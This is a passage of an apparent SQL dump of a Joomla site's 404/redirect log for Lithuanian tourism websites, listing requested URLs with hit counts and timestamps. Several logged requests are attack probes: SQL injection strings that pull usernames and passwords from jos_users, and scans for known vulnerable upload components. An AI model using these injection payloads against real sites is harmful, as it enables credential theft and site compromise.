00:00:00'),(1141,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/13-sample-data-article/demo/features/index.php/turizmo-informacija/turizmo-marsrutai//','','','',1,0,'2014-10-01 05:30:31','0000-00-00 00:00:00'),(1142,'http://www.infotytuvenai.lt/index.php/apie-centra/paslaugos//','','','',1,0,'2014-10-01 05:31:35','0000-00-00 00:00:00'),(1143,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/projektai/i-etapas-baznycios-restauravimas//','','','',1,0,'2014-10-01 06:23:36','0000-00-00 00:00:00'),(1144,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/tytuvenu-festivalis/index.php/apie-centra/viesieji-pirkimai//','','','',1,0,'2014-10-01 07:05:53','0000-00-00 00:00:00'),(1145,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/index.php/tytuvenu-festivalis/naujienos','','','',1,0,'2014-10-01 07:12:37','0000-00-00 00:00:00'),(1146,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/44-paskutinesnaujienos/index.php/tytuvenu-festivalis/programos//','','','',1,0,'2014-10-01 07:17:03','0000-00-00 00:00:00'),(1147,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/13-sample-data-article/demo/features/index.php/13-sample-data-article/demo/features/index.php/apie-centra/ekskursijos//','','','',1,0,'2014-10-01 07:35:11','0000-00-00 00:00:00'),(1148,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/index.php/turizmo-informacija/gido-paslaugos','','','',1,0,'2014-10-01 08:12:12','0000-00-00 00:00:00'),(1149,'http://www.infotytuvenai.lt/index.php/index.php/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/gido-paslaugos','','','',1,0,'2014-10-01 08:20:07','0000-00-00 00:00:00'),(1150,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/index.php/projektai/i-etapas-baznycios-restauravimas','','','',1,0,'2014-10-01 08:26:01','0000-00-00 00:00:00'),(1151,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/tytuvenu-festivalis/index.php/tytuvenu-festivalis/naujienos//','','','',1,0,'2014-10-01 09:04:19','0000-00-00 00:00:00'),(1152,'http://www.infotytuvenai.lt/index.php/index.php/index.php/tytuvenu-festivalis/index.php/apie-centra/darbo-uzmokestis','','','',1,0,'2014-10-01 09:14:57','0000-00-00 00:00:00'),(1153,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/44-paskutinesnaujienos/index.php/apie-centra/galerija//','','','',1,0,'2014-10-01 09:21:36','0000-00-00 00:00:00'),(1154,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/13-sample-data-article/demo/features/index.php/13-sample-data-article/demo/features/index.php/projektai/i-etapas-baznycios-restauravimas//','','','',1,0,'2014-10-01 09:53:56','0000-00-00 00:00:00'),(1155,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/tytuvenu-regioninis-parkas//','','','',1,0,'2014-10-01 09:58:49','0000-00-00 00:00:00'),(1156,'http://www.infotytuvenai.lt/index.php/index.php/index.php/index.php/apie-centra/veiklos-strategija//','','','',1,0,'2014-10-01 10:31:18','0000-00-00 00:00:00'),(1157,'http://www.infotytuvenai.lt/index.php/index.php/index.php/index.php/apie-centra/viesieji-pirkimai//','','','',1,0,'2014-10-01 10:42:59','0000-00-00 00:00:00'),(1158,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/13-sample-data-article/demo/features/index.php/apgyvendinimas/index.php/apie-centra/galerija//','','','',1,0,'2014-10-01 10:51:16','0000-00-00 00:00:00'),(1159,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/index.php/turizmo-informacija/aktyvus-poilsis','','','',1,0,'2014-10-01 11:14:29','0000-00-00 00:00:00'),(1160,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/index.php/tytuvenu-festivalis/galerija','','','',1,0,'2014-10-01 11:24:54','0000-00-00 00:00:00'),(1161,'http://www.infotytuvenai.lt/index.php/index.php/index.php/tytuvenu-festivalis/index.php/lankytini-objektai/muziejai','','','',1,0,'2014-10-01 13:32:40','0000-00-00 00:00:00'),(1162,'http://www.infotytuvenai.lt/index.php/13-sample-data-article/demo/features/index.php/apie-centra/darbo-uzmokestis//','','','',1,0,'2014-10-01 13:38:31','0000-00-00 00:00:00'),(1163,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/index.php/lankytini-objektai/muziejai','','','',1,0,'2014-10-01 14:12:00','0000-00-00 00:00:00'),(1164,'http://www.infotytuvenai.lt/index.php/index.php/index.php/index.php/index.php/turizmo-informacija/turizmo-marsrutai//','','','',1,0,'2014-10-01 14:18:46','0000-00-00 00:00:00'),(1165,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/index.php/turizmo-informacija/suvenyrai//','','','',1,0,'2014-10-01 14:27:55','0000-00-00 00:00:00'),(1166,'http://www.infotytuvenai.lt/index.php/index.php/13-sample-data-article/demo/features/index.php/turizmo-informacija/dubysos-regioninis-parkas//','','','',1,0,'2014-10-01 14:39:55','0000-00-00 00:00:00'),(1167,'http://www.infotytuvenai.lt/index.php/index.php/index.php/tytuvenu-festivalis/index.php/tytuvenu-festivalis/kontaktai','','','',1,0,'2014-10-01 15:05:45','0000-00-00 00:00:00'),(1168,'http://www.infotytuvenai.lt/index.php/index.php/index.php/index.php/index.php/turizmo-informacija/aktyvus-poilsis//','','','',1,0,'2014-10-01 15:20:01','0000-00-00 00:00:00'),(1169,'http://tytuvenai.eu//index.php?option=com_jdownloads&Itemid=0&view=upload','','','',4,0,'2014-10-01 16:01:02','0000-00-00 00:00:00'),(1170,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/tytuvenu-festivalis/index.php/apie-centra/galerija//','','','',1,0,'2014-10-01 16:45:28','0000-00-00 00:00:00'),(1171,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/13-sample-data-article/demo/features/index.php/apgyvendinimas/index.php/apie-centra/suvenyrai//','','','',1,0,'2014-10-01 17:05:51','0000-00-00 00:00:00'),(1172,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/44-paskutinesnaujienos/index.php/../../undefined/','','','',1,0,'2014-10-01 17:36:42','0000-00-00 00:00:00'),(1173,'http://www.infotytuvenai.lt/index.php/index.php/index.php/index.php/13-sample-data-article/demo/features/index.php/apie-centra/ekskursijos//','','','',1,0,'2014-10-01 17:40:24','0000-00-00 00:00:00'),(1174,'http://www.infotytuvenai.lt/index.php/index.php/index.php/tytuvenu-festivalis/index.php/projektai/ii-etapas-baznycios-restauravimas','','','',1,0,'2014-10-01 17:42:21','0000-00-00 00:00:00'),(1175,'http://www.infotytuvenai.lt/index.php/index.php/index.php/13-sample-data-article/demo/features/index.php/apie-centra/galerija//','','','',1,0,'2014-10-01 17:50:24','0000-00-00 00:00:00'),(1176,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/tytuvenu-festivalis/index.php/tytuvenu-festivalis/galerija//','','','',1,0,'2014-10-01 17:53:10','0000-00-00 00:00:00'),(1177,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/index.php/projektai','','','',1,0,'2014-10-01 18:00:28','0000-00-00 00:00:00'),(1178,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/index.php/apie-centra/galerija//','','','',1,0,'2014-10-01 18:15:10','0000-00-00 00:00:00'),(1179,'http://www.infotytuvenai.lt/index.php/index.php/index.php/index.php/13-sample-data-article/demo/features/index.php/apie-centra/galerija//','','','',1,0,'2014-10-01 18:30:00','0000-00-00 00:00:00'),(1180,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/index.php/turizmo-informacija/kurtuvenu-regioninis-parkas','','','',1,0,'2014-10-01 18:38:36','0000-00-00 00:00:00'),(1181,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/index.php/apie-centra/viesieji-pirkimai','','','',1,0,'2014-10-01 19:16:12','0000-00-00 00:00:00'),(1182,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/44-paskutinesnaujienos/index.php/turizmo-informacija/tytuvenu-regioninis-parkas//','','','',1,0,'2014-10-01 19:29:27','0000-00-00 00:00:00'),(1183,'http://www.infotytuvenai.lt/index.php/index.php/index.php/index.php/turizmo-informacija/suvenyrai//','','','',1,0,'2014-10-01 20:10:25','0000-00-00 00:00:00'),(1184,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/index.php/apie-centra/veiklos-strategija','','','',1,0,'2014-10-01 20:43:49','0000-00-00 00:00:00'),(1185,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/13-sample-data-article/demo/features/index.php/apgyvendinimas/index.php/projektai/ii-etapas-baznycios-restauravimas//','','','',1,0,'2014-10-01 20:46:08','0000-00-00 00:00:00'),(1186,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/turizmo-marsrutai//','','','',1,0,'2014-10-01 20:47:56','0000-00-00 00:00:00'),(1187,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/index.php/tytuvenu-festivalis/programos','','','',1,0,'2014-10-01 21:07:53','0000-00-00 00:00:00'),(1188,'http://www.infotytuvenai.lt/index.php/index.php/index.php/index.php/turizmo-informacija/dubysos-regioninis-parkas//','','','',1,0,'2014-10-01 21:44:47','0000-00-00 00:00:00'),(1189,'http://www.infotytuvenai.lt/index.php/index.php/index.php/tytuvenu-festivalis/index.php/apie-centra','','','',1,0,'2014-10-01 21:50:20','0000-00-00 00:00:00'),(1190,'http://www.infotytuvenai.lt/index.php/index.php/index.php/apgyvendinimas/index.php/apie-centra/veiklos-strategija','','','',1,0,'2014-10-01 22:16:31','0000-00-00 00:00:00'),(1191,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/apgyvendinimas/index.php/turizmo-informacija/dubysos-regioninis-parkas//','','','',1,0,'2014-10-01 22:33:43','0000-00-00 00:00:00'),(1192,'http://tytuvenai.eu//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload&141001-154008','','','',1,0,'2014-10-01 22:40:09','0000-00-00 00:00:00'),(1193,'http://tytuvenai.eu/index.php?option=com_community&view=frontpage&141001-154009','','','',1,0,'2014-10-01 22:40:09','0000-00-00 00:00:00'),(1194,'http://tytuvenai.eu/index.php?141001-154009','','','',1,0,'2014-10-01 22:40:10','0000-00-00 00:00:00'),(1195,'http://tytuvenai.eu/index.php?option=com_jdownloads&Itemid=101&view=upload&141001-154011','','','',1,0,'2014-10-01 22:40:11','0000-00-00 00:00:00'),(1196,'http://www.infotytuvenai.lt/index.php/index.php/index.php/index.php/13-sample-data-article/demo/features/index.php/turizmo-informacija/kulinarinis-paveldas//','','','',1,0,'2014-10-01 22:54:12','0000-00-00 00:00:00'),(1197,'http://www.infotytuvenai.lt/index.php/index.php/index.php/index.php/index.php/apie-centra/suvenyrai//','','','',1,0,'2014-10-01 23:15:53','0000-00-00 00:00:00'),(1198,'http://www.infotytuvenai.lt/index.php/index.php/index.php/index.php/turizmo-informacija/tytuvenu-regioninis-parkas//','','','',1,0,'2014-10-01 23:27:22','0000-00-00 00:00:00'),(1199,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/13-sample-data-article/demo/features/index.php/projektai/i-etapas-baznycios-restauravimas//','','','',1,0,'2014-10-01 23:48:59','0000-00-00 00:00:00'),(1200,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/index.php/turizmo-informacija/kulinarinis-paveldas//','','','',1,0,'2014-10-02 00:17:00','0000-00-00 00:00:00'),(1201,'http://tytuvenai.eu/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN/**/sElecT/**/1,/*!concat(0x3b3b3b,username,0x3e3e3e,password,0x7c7c7c,usertype)*//**//*!from*//**/jos_users/**//*!WheRe*//**/usertype=','','http://tytuvenai.eu/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN/**/sElecT/**/1,/*!concat(0x3b','',1,0,'2014-10-02 10:30:20','0000-00-00 00:00:00'),(1202,'http://www.tytuvenai.eu/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',2,0,'2014-10-03 10:37:30','0000-00-00 00:00:00'),(1203,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=9','','','',4,0,'2014-10-04 08:56:46','0000-00-00 00:00:00'),(1204,'http://www.infotytuvenai.lt/index.php/component/content/article/44-paskutinesnaujienos/122-konkursas-vyr-finansininko-s-pareigybms-eiti','','','',7,0,'2014-10-07 10:05:52','0000-00-00 00:00:00'),(1205,'http://tytuvenai.eu/index.php?option=com_content&view=category&layout=blog&id=38&Itemid=64','','','',2,0,'2014-10-09 04:59:05','0000-00-00 00:00:00'),(1206,'http://tytuvenai.eu//index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',10,0,'2014-10-10 19:21:12','0000-00-00 00:00:00'),(1207,'http://www.tytuvenai.eu//index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',50,0,'2014-10-10 19:22:19','0000-00-00 00:00:00'),(1208,'http://infotytuvenai.lt//index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',49,0,'2014-10-12 18:34:39','0000-00-00 00:00:00'),(1209,'http://infotytuvenai.lt/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload','','','',15,0,'2014-10-12 18:34:40','0000-00-00 00:00:00'),(1210,'http://tytuvenai.eu/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',38,0,'2014-10-14 07:43:14','0000-00-00 00:00:00'),(1211,'http://www.tytuvenai.eu/index.php?option=com_user&view=register','','http://www.tytuvenai.eu/','',26,0,'2014-10-17 16:46:46','0000-00-00 00:00:00'),(1212,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=15','','','',1,0,'2014-10-18 03:11:32','0000-00-00 00:00:00'),(1213,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=6','','','',1,0,'2014-10-19 03:10:53','0000-00-00 00:00:00'),(1214,'http://tytuvenai.eu//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload&141019-223208','','','',1,0,'2014-10-20 05:32:09','0000-00-00 00:00:00'),(1215,'http://tytuvenai.eu/index.php?option=com_community&view=frontpage&141019-223209','','','',1,0,'2014-10-20 05:32:10','0000-00-00 00:00:00'),(1216,'http://tytuvenai.eu/index.php?141019-223210','','','',1,0,'2014-10-20 05:32:10','0000-00-00 00:00:00'),(1217,'http://tytuvenai.eu/index.php?option=com_jdownloads&Itemid=101&view=upload&141019-223211','','','',1,0,'2014-10-20 05:32:12','0000-00-00 00:00:00'),(1218,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=11','','','',1,0,'2014-10-25 19:50:55','0000-00-00 00:00:00'),(1219,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=13','','','',3,0,'2014-10-28 07:37:10','0000-00-00 00:00:00'),(1220,'http://infotytuvenai.lt/index.php/component/content/article/44-paskutinesnaujienos/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php','','','',1,0,'2014-10-29 11:40:27','0000-00-00 00:00:00'),(1221,'http://tytuvenai.eu//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload&141030-141457','','','',1,0,'2014-10-30 21:14:58','0000-00-00 00:00:00'),(1222,'http://tytuvenai.eu/index.php?option=com_community&view=frontpage&141030-141459','','','',1,0,'2014-10-30 21:14:59','0000-00-00 00:00:00'),(1223,'http://tytuvenai.eu/index.php?141030-141459','','','',1,0,'2014-10-30 21:15:00','0000-00-00 00:00:00'),(1224,'http://tytuvenai.eu/index.php?option=com_jdownloads&Itemid=101&view=upload&141030-141502','','','',1,0,'2014-10-30 21:15:02','0000-00-00 00:00:00'),(1225,'http://www.tytuvenai.eu//index.php','','','',106,0,'2014-10-30 22:24:10','0000-00-00 00:00:00'),(1226,'http://www.infotytuvenai.lt/index.php/apgyvendinimas/fancybox/fancy_shadow_n.png','','','',6,0,'2014-11-03 09:02:09','0000-00-00 00:00:00'),(1227,'http://www.infotytuvenai.lt/index.php/apgyvendinimas/fancybox/fancy_shadow_ne.png','','','',6,0,'2014-11-03 09:02:09','0000-00-00 00:00:00'),(1228,'http://www.infotytuvenai.lt/index.php/apgyvendinimas/fancybox/fancy_shadow_e.png','','','',6,0,'2014-11-03 09:02:10','0000-00-00 00:00:00'),(1229,'http://www.infotytuvenai.lt/index.php/apgyvendinimas/fancybox/fancy_shadow_se.png','','','',6,0,'2014-11-03 09:02:10','0000-00-00 00:00:00'),(1230,'http://www.infotytuvenai.lt/index.php/apgyvendinimas/fancybox/fancy_shadow_s.png','','','',6,0,'2014-11-03 09:02:11','0000-00-00 00:00:00'),(1231,'http://www.infotytuvenai.lt/index.php/apgyvendinimas/fancybox/fancy_shadow_sw.png','','','',6,0,'2014-11-03 09:02:11','0000-00-00 00:00:00'),(1232,'http://www.infotytuvenai.lt/index.php/apgyvendinimas/fancybox/fancy_shadow_w.png','','','',6,0,'2014-11-03 09:02:12','0000-00-00 00:00:00'),(1233,'http://www.infotytuvenai.lt/index.php/apgyvendinimas/fancybox/fancy_shadow_nw.png','','','',6,0,'2014-11-03 09:02:12','0000-00-00 00:00:00'),(1234,'http://tytuvenai.eu//index.php','','','',37,0,'2014-11-03 16:41:05','0000-00-00 00:00:00'),(1235,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=10','','','',1,0,'2014-11-06 03:03:28','0000-00-00 00:00:00'),(1236,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=37:where-did-the-mambots-go','','','',1,0,'2014-11-06 14:36:05','0000-00-00 00:00:00'),(1237,'http://tytuvenai.eu/index.php?option=com_ckforms&controller=ckdata&view=ckformsdata&layout=detail&task=detail&fid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,group_concat(0x3C6B65793E,version()','','','',1,0,'2014-11-10 12:36:04','0000-00-00 00:00:00'),(1238,'http://www.tytuvenai.eu/index.php/component/content/category/\"index.php/apie-centra/ekskursijos\">\"Ekskursijos\"</a>.</p>','','','',1,0,'2014-11-13 03:21:33','0000-00-00 00:00:00'),(1239,'http://www.tytuvenai.eu/index.php/component/content/category/\"http://lt.wikipedia.org/w/index.php?title=Kražių_žemė&action=edit&redlink=1\"><span>Kražių','','','',1,0,'2014-11-13 03:21:42','0000-00-00 00:00:00'),(1240,'http://www.tytuvenai.eu/index.php/component/content/category/\"http://www.irkluojambaidares.lt/\">http://www.irkluojambaidares.lt</a></p>','','','',1,0,'2014-11-13 03:21:45','0000-00-00 00:00:00'),(1241,'http://www.tytuvenai.eu/index.php/component/content/category/\"http://www.tytuvenai.eu./\"','','','',1,0,'2014-11-13 03:21:46','0000-00-00 00:00:00'),(1242,'http://www.tytuvenai.eu/index.php/component/content/category/\"http://www.irkluojambaidares.lt/\">http://www.katamaranai.lt</a></p>','','','',1,0,'2014-11-13 03:21:52','0000-00-00 00:00:00'),(1243,'http://www.tytuvenai.eu/index.php/component/content/category/\"https://deklaravimas.vmi.lt/\"','','','',1,0,'2014-11-13 03:21:53','0000-00-00 00:00:00'),(1244,'http://www.tytuvenai.eu/index.php/component/content/category/\"mailto:info@tytuvenai.eu\"','','','',1,0,'2014-11-13 03:21:58','0000-00-00 00:00:00'),(1245,'http://www.tytuvenai.eu/index.php/component/content/category/\"mailto:kelmesmuziejus@takas.lt\">kelmesmuziejus@takas.lt</a></p>','','','',1,0,'2014-11-13 03:22:02','0000-00-00 00:00:00'),(1246,'http://www.tytuvenai.eu/index.php/component/content/category/\"mailto:info@5sezonas.lt\"','','','',1,0,'2014-11-13 03:22:03','0000-00-00 00:00:00'),(1247,'http://www.tytuvenai.eu/index.php/component/content/category/\"mailto:akucinskas@gmail.com\">akucinskas@gmail.com</a><br','','','',1,0,'2014-11-13 03:22:05','0000-00-00 00:00:00'),(1248,'http://www.tytuvenai.eu/index.php/component/content/category/index.php','','','',1,0,'2014-11-13 03:22:06','0000-00-00 00:00:00'),(1249,'http://www.tytuvenai.eu/index.php/component/content/category/\"mailto:akucinskas@gmail.com\">@zakeliskiai.</a>lt<br','','','',1,0,'2014-11-13 03:22:13','0000-00-00 00:00:00'),(1250,'http://www.tytuvenai.eu/index.php/component/content/category/\"http://www.tytuvenai.lt/index.php?option=com_content&view=article&id=121:x-tarptautinio-tytuvn-vasaros-festivalio-programa&catid=53:tytuvn-vasaros-festivalis&Itemid=89\"><img','','','',1,0,'2014-11-13 04:42:46','0000-00-00 00:00:00'),(1251,'http://www.tytuvenai.eu/index.php/component/content/category/\"mailto:kelmesmuziejus@takas.lt\">knygynas@takas.lt</a></p>','','','',1,0,'2014-11-13 04:42:47','0000-00-00 00:00:00'),(1252,'http://www.tytuvenai.eu/index.php/component/content/category/\"http://www.lyduvenu-baidares.lt/\">http://www.lyduvenu-baidares.lt/</a></p>','','','',1,0,'2014-11-13 04:42:48','0000-00-00 00:00:00'),(1253,'http://www.tytuvenai.eu/index.php/component/content/category/\"images/stories/fr0512.pdf\"','','','',1,0,'2014-11-13 04:42:49','0000-00-00 00:00:00'),(1254,'http://www.tytuvenai.eu/index.php/component/content/category/\"http://kurtuva.lt/\"','','','',1,0,'2014-11-13 04:42:50','0000-00-00 00:00:00'),(1255,'http://www.tytuvenai.eu/index.php/component/content/category/\"http://www.pabariukai.lt/\">http://www.pabariukai.lt</a></p>','','','',1,0,'2014-11-13 04:42:53','0000-00-00 00:00:00'),(1256,'http://www.tytuvenai.eu/index.php/component/content/category/\"http://lt.wikipedia.org/wiki/Jėzuitai\">jėzuitų</a>','','','',1,0,'2014-11-13 04:43:02','0000-00-00 00:00:00'),(1257,'http://www.tytuvenai.eu/index.php/component/content/category/\"mailto:el.p.kraziukc@gmail.com\">kraziukc@kraziai.lt</a></div>','','','',1,0,'2014-11-13 04:43:13','0000-00-00 00:00:00'),(1258,'http://www.tytuvenai.eu/index.php/component/content/category/\"http://www.kraziai.lt\">www.kraziai.lt</a></div>','','','',1,0,'2014-11-13 04:43:19','0000-00-00 00:00:00'),(1259,'http://www.tytuvenai.eu/index.php/component/content/category/\"http://lt.wikipedia.org/wiki/1394\"><span>1394</span></a>','','','',1,0,'2014-11-13 04:43:21','0000-00-00 00:00:00'),(1260,'http://www.tytuvenai.eu/index.php/component/content/category/\"http://www.kelme.lt/\"','','','',1,0,'2014-11-13 04:43:27','0000-00-00 00:00:00'),(1261,'http://www.tytuvenai.eu/index.php/component/content/category/\"images/stories/veikla/veiklos_strategija.pdf\"','','','',1,0,'2014-11-13 04:43:39','0000-00-00 00:00:00'),(1262,'http://www.tytuvenai.eu/index.php/component/content/category/','','','',1,0,'2014-11-13 04:43:40','0000-00-00 00:00:00'),(1263,'http://www.tytuvenai.eu/index.php/component/content/category/\"http://www.drevuzyne.lt\"','','','',1,0,'2014-11-13 04:43:42','0000-00-00 00:00:00'),(1264,'http://www.tytuvenai.eu/index.php/component/content/category/\"http://www.irkluojambaidares.lt/\">http://www.zakeliskiai.lt</a></p>','','','',1,0,'2014-11-13 04:43:47','0000-00-00 00:00:00'),(1265,'http://www.tytuvenai.eu/index.php/component/content/category/\"http://lt.wikipedia.org/wiki/1844\">1844</a>','','','',1,0,'2014-11-13 04:43:49','0000-00-00 00:00:00'),(1266,'http://www.tytuvenai.eu/index.php/component/content/category/\"http://www.5sezonas.lt/\"','','','',1,0,'2014-11-13 04:43:51','0000-00-00 00:00:00'),(1267,'http://www.tytuvenai.eu/index.php/component/content/category/\"mailto:katamaranai.visiems@gmail.com\">katamaranai.visiems@gmail.com</a><br','','','',1,0,'2014-11-13 04:43:55','0000-00-00 00:00:00'),(1268,'http://www.tytuvenai.eu/index.php/component/content/category/\"http://lt.wikipedia.org/wiki/1614\">1614</a>–<a','','','',1,0,'2014-11-13 04:44:02','0000-00-00 00:00:00'),(1269,'http://www.tytuvenai.eu/index.php/component/content/category/\"http://lt.wikipedia.org/w/index.php','','','',1,0,'2014-11-13 04:44:03','0000-00-00 00:00:00'),(1270,'http://www.tytuvenai.eu/index.php/component/content/category/\"mailto:info@sodybagaja.lt\">info@sodybagaja.lt</a><br','','','',1,0,'2014-11-13 04:44:10','0000-00-00 00:00:00'),(1271,'http://www.tytuvenai.eu/index.php/component/content/category/\"http://www.kelmesmuziejus.lt\">www.kelmesmuziejus.lt','','','',1,0,'2014-11-13 04:44:11','0000-00-00 00:00:00'),(1272,'http://www.tytuvenai.eu/index.php/component/content/category/\"http://www.sodybagaja.lt/\">www.sodybagaja.lt</a> </p>','','','',1,0,'2014-11-13 04:44:14','0000-00-00 00:00:00'),(1273,'http://www.tytuvenai.eu/index.php/component/content/category/\"http://www.varniuparkas.lt/\"','','','',1,0,'2014-11-13 04:44:17','0000-00-00 00:00:00'),(1274,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/apie-centra/veiklos-strategija','','','',1,0,'2014-11-13 04:44:18','0000-00-00 00:00:00'),(1275,'http://www.tytuvenai.eu/index.php/component/content/category/\"http://www.tytuvenai.eu\">www.tytuvenai.eu</a><br','','','',1,0,'2014-11-13 04:44:19','0000-00-00 00:00:00'),(1276,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/lankytini-objektai/muziejai','','','',1,0,'2014-11-13 04:44:20','0000-00-00 00:00:00'),(1277,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/kurtuvenu-regioninis-parkas','','','',1,0,'2014-11-13 04:44:21','0000-00-00 00:00:00'),(1278,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/turizmo-marsrutai','','','',1,0,'2014-11-13 04:44:22','0000-00-00 00:00:00'),(1279,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/apie-centra/paslaugos','','','',1,0,'2014-11-13 04:44:23','0000-00-00 00:00:00'),(1280,'http://www.tytuvenai.eu/index.php/component/content/category/\"http://lt.wikipedia.org/wiki/1253\"><span>1253</span></a>','','','',1,0,'2014-11-13 04:44:25','0000-00-00 00:00:00'),(1281,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/apie-centra/ekskursijos','','','',1,0,'2014-11-13 04:44:29','0000-00-00 00:00:00'),(1282,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/apie-centra','','','',1,0,'2014-11-13 04:44:30','0000-00-00 00:00:00'),(1283,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/apie-centra/suvenyrai','','','',1,0,'2014-11-13 04:44:32','0000-00-00 00:00:00'),(1284,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/apie-centra/parama','','','',1,0,'2014-11-13 04:44:33','0000-00-00 00:00:00'),(1285,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/tytuvenu-festivalis/kontaktai','','','',1,0,'2014-11-13 04:44:35','0000-00-00 00:00:00'),(1286,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/apgyvendinimas/kaimo-turizmas','','','',1,0,'2014-11-13 04:44:36','0000-00-00 00:00:00'),(1287,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/tytuvenu-festivalis/galerija','','','',1,0,'2014-11-13 04:44:37','0000-00-00 00:00:00'),(1288,'http://www.tytuvenai.eu/index.php/component/content/category/\"http://www.tytuvenai.lt/index.php','','','',1,0,'2014-11-13 04:44:39','0000-00-00 00:00:00'),(1289,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/apgyvendinimas','','','',1,0,'2014-11-13 04:44:40','0000-00-00 00:00:00'),(1290,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/tytuvenu-festivalis/programos','','','',1,0,'2014-11-13 04:44:41','0000-00-00 00:00:00'),(1291,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/13-sample-data-article/demo/features/31-renginiai','','','',1,0,'2014-11-13 04:44:43','0000-00-00 00:00:00'),(1292,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/projektai/i-etapas-baznycios-restauravimas','','','',1,0,'2014-11-13 04:44:46','0000-00-00 00:00:00'),(1293,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/apie-centra/viesieji-pirkimai','','','',1,0,'2014-11-13 04:44:48','0000-00-00 00:00:00'),(1294,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/dubysos-regioninis-parkas','','','',1,0,'2014-11-13 04:44:54','0000-00-00 00:00:00'),(1295,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/projektai','','','',1,0,'2014-11-13 04:44:57','0000-00-00 00:00:00'),(1296,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/maitinimas','','','',1,0,'2014-11-13 04:44:59','0000-00-00 